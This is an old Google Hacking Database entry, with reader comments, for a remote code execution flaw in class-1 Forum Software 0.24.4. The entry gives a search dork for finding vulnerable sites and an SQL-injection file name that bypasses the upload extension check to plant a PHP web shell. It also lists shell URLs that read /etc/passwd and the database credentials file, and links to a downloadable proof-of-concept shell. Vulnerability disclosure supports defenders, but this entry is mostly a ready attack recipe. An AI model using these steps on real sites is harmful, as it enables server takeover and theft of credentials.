GHDB « Hackers For Charity

GHDB

GHDB

Google Search: “Powered by and copyright class-1″ 0.24.4

rgod rates this entry 10 out of 10.
Submitted: 2005-09-08 00:00:00
Added by: rgod
Hits: 832
Score: 10

class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions…look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but… what happen if you try to upload a filewith this name? :shell.php.’ or ‘a’ =’a;)[1] SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension=” or ‘a’ =’a’ AND file_type=’Image’you have bypassed the check… now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file…you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20./../db_config.incto see database username and passwordand so on…you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: “Powered by and copyright class-1″rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it

Comments:


5 Responses to “GHDB”

  1. Jack says:
    October 26, 2011 at 9:12 pm

    Does GHDB still updates for now?

  2. Johnny says:
    October 27, 2011 at 3:31 am

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:
    April 20, 2013 at 7:10 am

    Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???

  4. Johnny says:
    April 27, 2013 at 5:10 am

    The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:
    May 7, 2013 at 7:38 am

    Is any offline view-able resources is available of this product ?

Leave a Reply